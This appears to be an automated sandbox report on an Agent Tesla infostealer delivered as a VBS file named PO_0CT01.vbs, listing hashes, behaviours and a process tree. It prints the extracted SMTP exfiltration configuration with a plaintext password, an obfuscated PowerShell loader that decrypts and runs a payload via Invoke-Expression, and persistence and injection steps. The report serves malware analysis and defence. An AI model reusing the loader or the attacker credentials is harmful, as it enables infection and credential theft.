Analysis
- max time kernel: 143s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20231127-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231127-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 01-12-2023 06:40

Static task: static1

Behavioral task: behavioral1
- Sample: PO_0CT01.vbs
- Resource: win7-20231020-en

Behavioral task: behavioral2
- Sample: PO_0CT01.vbs
- Resource: win10v2004-20231127-en
General
- Target: PO_0CT01.vbs
- Size: 159KB
- MD5: dcef6132db05f9704623b495b05c1e4a
- SHA1: ec64670ba9e10bf41fa634be3f8b7c5bec0f719b
- SHA256: 18f41f2a39ff37e43e2a8e01b0447d613257682929e0d5383458935d8279773c
- SHA512: 6c4eef2875783152687021060b390269e7de5756bcdf45f26880a83a8b65e99240483be5cf72caec6210c706060b53f03ebbf49a46685b4b747fa9c1e27b5b5d
- SSDEEP: 1536:vSBSNS2SNSJSNSImSNSzSNSmSNS8SNSySNSaSNS1SP:v0YzYsYeYmYTY5YHYPYQg
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Host: mail.dlewarez.info
- Port: 587
- Username: [email protected]
- Password: esubwDViXlQ2@@##
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Blocklisted process makes network request (1 IoC)
  Processes: flow 11, pid 3436, powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  Key value queried: \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LnkName.lnk (powershell.exe)
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes: flow 32, api.ipify.org; flow 33, api.ipify.org
- Suspicious use of SetThreadContext (1 IoC)
  PID 3436 (powershell.exe) set thread context of PID 2288 (RegAsm.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoC)
  pid 4320 WerFault.exe, target pid 2288 RegAsm.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 3436 powershell.exe (x2); pid 640 powershell.exe (x2); pid 2288 RegAsm.exe (x2)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege for pid 3436 powershell.exe; pid 640 powershell.exe; pid 2288 RegAsm.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  PID 2936 (WScript.exe) wrote to memory of PID 3436 (powershell.exe) (x2)
  PID 3436 (powershell.exe) wrote to memory of PID 640 (powershell.exe) (x2)
  PID 3436 (powershell.exe) wrote to memory of PID 2288 (RegAsm.exe) (x8)
Processes
- C:\Windows\System32\WScript.exe (PID: 2936)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_0CT01.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 3436)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '23176310927586413792';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe (PID: 640)
      "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\VbsName.vbs
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID: 2288)
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\WerFault.exe (PID: 4320)
        C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 2080
        - Program crash
- C:\Windows\SysWOW64\WerFault.exe (PID: 4380)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2288 -ip 2288